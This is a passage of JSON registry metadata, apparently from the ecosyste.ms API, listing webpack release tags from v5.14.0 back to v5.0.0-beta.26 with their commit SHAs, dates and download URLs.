ebpack/webpack@v5.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0/manifests"},{"name":"v5.13.0","sha":"a694cdfb82b5fd0a5c52102083a267a36446e03e","kind":"tag","published_at":"2021-01-11T22:30:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0/manifests"},{"name":"v4.46.0","sha":"444e59f8a427f94f0064cae6765e5a3c4b78596d","kind":"tag","published_at":"2021-01-11T13:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0/manifests"},{"name":"v5.12.3","sha":"a064b0ff3315db0d95124aaf5cc9b0a6add82926","kind":"tag","published_at":"2021-01-10T18:23:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3/manifests"},{"name":"v5.12.2","sha":"88610d738ff78fa3fb7f859ee284c632bca42a24","kind":"tag","published_at":"2021-01-09T08:27:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2/manifests"},{"name":"v5.12.1","sha":"62ec1546260d168cffd5dec8fc397c6e1159e4e4","kind":"tag","published_at":"2021-01-08T15:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1/manifests"},{"name":"v5.12.0","sha":"74c9c72b873b27ec552cd6b85a9b578d6698e102","kind":"tag","published_at":"2021-01-08T12:58:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0/manifests"},{"name":"v4.45.0","sha":"03313223fd4a0d4e570b8c79971e61b28cb3aeae","kind":"tag","published_at":"2021-01-08T12:53:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0/manifests"},{"name":"v5.11.1","sha":"98bcf44a43d0109ac2680487fddf3c3262395e1f","kind":"tag","published_at":"2020-12-28T18:06:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1/manifests"},{"name":"v5.11.0","sha":"f04328bad933fd9bacea389df17db96ffbd2336b","kind":"tag","published_at":"2020-12-17T15:59:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0/manifests"},{"name":"v5.10.3","sha":"10ad4e95b850bbe20019275fd1d364666c4b69ea","kind":"tag","published_at":"2020-12-15T20:00:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3/manifests"},{"name":"v5.10.2","sha":"c937292e6fb2e1e0a618d9d633f4184ec64cda75","kind":"tag","published_at":"2020-12-15T08:08:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2/manifests"},{"name":"v5.10.1","sha":"3f3d0138f9c18658be87d89d609fc7c6d286005f","kind":"tag","published_at":"2020-12-11T20:32:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1/manifests"},{"name":"v5.10.0","sha":"06e1cce1221ca717fc8efbaeca5ca71246f85a44","kind":"tag","published_at":"2020-12-04T19:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0/manifests"},{"name":"v5.9.0","sha":"0e7437dc3042874649919d4ffe005db13053c4ff","kind":"tag","published_at":"2020-11-28T21:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0/manifests"},{"name":"v5.8.0","sha":"fb7d09b315bbf3b5388eed0cc5e58309187a3acc","kind":"tag","published_at":"2020-11-26T17:58:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0/manifests"},{"name":"v5.7.0","sha":"4ba6d2ea67e9046cbba83f588989b3cadff7d911","kind":"tag","published_at":"2020-11-26T06:08:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0/manifests"},{"name":"v5.6.0","sha":"1936615458352f38ff517d258b936d690a7b631f","kind":"tag","published_at":"2020-11-19T12:18:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0/manifests"},{"name":"v5.5.1","sha":"a6ebce41059a029163a1774b35d81e0bfaa05b27","kind":"tag","published_at":"2020-11-18T12:39:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1/manifests"},{"name":"v5.5.0","sha":"3471c776059ac2d26593ea39f9c47c1874253dbb","kind":"tag","published_at":"2020-11-17T13:23:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0/manifests"},{"name":"v5.4.0","sha":"84dafd164499b6080243cf9d00537b47b6e075c2","kind":"tag","published_at":"2020-11-03T15:28:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0/manifests"},{"name":"v5.3.2","sha":"3df96f4a7843ef07794c31da8c7469dff133a228","kind":"tag","published_at":"2020-10-29T19:52:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2/manifests"},{"name":"v5.3.1","sha":"dfae6f0ac70e1f4ec6d25a853838d4aa58e10e1f","kind":"tag","published_at":"2020-10-28T21:07:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"ab555844701209492debf23cc3168a0efafb3251","kind":"tag","published_at":"2020-10-27T11:52:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0/manifests"},{"name":"v5.2.1","sha":"d09357b4008da750e0d90066b2cd9567edc27a61","kind":"tag","published_at":"2020-10-27T11:02:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"d42705c05dd62d562b759fb518f86c9854435df4","kind":"tag","published_at":"2020-10-22T16:59:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0/manifests"},{"name":"v5.1.3","sha":"c90dfadbc6c5ac1ab4bda2cc106958b65fb5e6e7","kind":"tag","published_at":"2020-10-16T13:36:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3/manifests"},{"name":"v5.1.2","sha":"83790375529c5b2967d45ed40700399e107d478f","kind":"tag","published_at":"2020-10-15T18:41:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2/manifests"},{"name":"v5.1.1","sha":"f2f998b58362d5edc9945a48f8245a3347ad007c","kind":"tag","published_at":"2020-10-15T13:08:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1/manifests"},{"name":"v5.1.0","sha":"77329b4d0e1aa35e26d8a32b2a8968a824b5de9c","kind":"tag","published_at":"2020-10-13T12:37:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"610f36817af1f1c6929786d68f734ac582af1757","kind":"tag","published_at":"2020-10-10T20:07:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0/manifests"},{"name":"v5.0.0-rc.6","sha":"75ecff262ef0c1953e0d13c0b6a06bdad7ccace5","kind":"tag","published_at":"2020-10-10T19:03:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6/manifests"},{"name":"v5.0.0-rc.5","sha":"57b493f6ff0bd55dddfbfc7ffc2f2680a7f82a6d","kind":"tag","published_at":"2020-10-09T22:38:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5/manifests"},{"name":"v5.0.0-rc.4","sha":"1755fe30224943bca80e14634b4cf3f876e529ef","kind":"tag","published_at":"2020-10-07T08:49:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4/manifests"},{"name":"v5.0.0-rc.3","sha":"ef38f322a963034271b76258beed35239760f526","kind":"tag","published_at":"2020-09-30T08:48:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3/manifests"},{"name":"v5.0.0-rc.2","sha":"d49b49ddebc6c06703e19ff6391915d2b09b0f2b","kind":"tag","published_at":"2020-09-29T18:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2/manifests"},{"name":"v5.0.0-rc.1","sha":"f60db1a079c7df48400637c54c547c161ed189da","kind":"tag","published_at":"2020-09-28T19:18:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1/manifests"},{"name":"v5.0.0-rc.0","sha":"658209c253287de9edee85293d23123d5183a873","kind":"tag","published_at":"2020-09-20T21:11:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0/manifests"},{"name":"v5.0.0-beta.33","sha":"dd3ec4f8072605479410ee7c13cb7a12688939d1","kind":"tag","published_at":"2020-09-20T21:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.33","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.33","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33/manifests"},{"name":"v5.0.0-beta.32","sha":"e81882adb2ca1a3cceb3dc28d4f73c09f013eb83","kind":"tag","published_at":"2020-09-18T18:08:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32/manifests"},{"name":"v4.44.2","sha":"2efeb4b5787e868e69233aa9dec469c200fa3b2c","kind":"tag","published_at":"2020-09-17T23:43:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2/manifests"},{"name":"v5.0.0-beta.31","sha":"ea492a530f83b35346986c374f8394814f187eb8","kind":"tag","published_at":"2020-09-17T13:43:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31/manifests"},{"name":"v5.0.0-beta.30","sha":"922c95e9b458e44b999aca2c45d9540079a225b2","kind":"tag","published_at":"2020-09-11T21:55:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30/manifests"},{"name":"v5.0.0-beta.29","sha":"7bc3a031996d17d859d7a5b077ce1c5ab5dc7e29","kind":"tag","published_at":"2020-08-28T19:21:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29/manifests"},{"name":"v5.0.0-beta.28","sha":"e32daa9be5fed184c8befac87216a88872f7df4a","kind":"tag","published_at":"2020-08-20T09:42:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28/manifests"},{"name":"v5.0.0-beta.27","sha":"3cdff531d77ee63251a385e3b6e3ccca2ec37a64","kind":"tag","published_at":"2020-08-19T20:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27/manifests"},{"name":"v5.0.0-beta.26","sha":"f2b68e0b77a3b4199c0d6989eeb69bd9a0bdb2ed","kind":"tag","published_at":"2020-08-14T19:06:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.26","tag_url":"https://repos.ecosyste.ms/api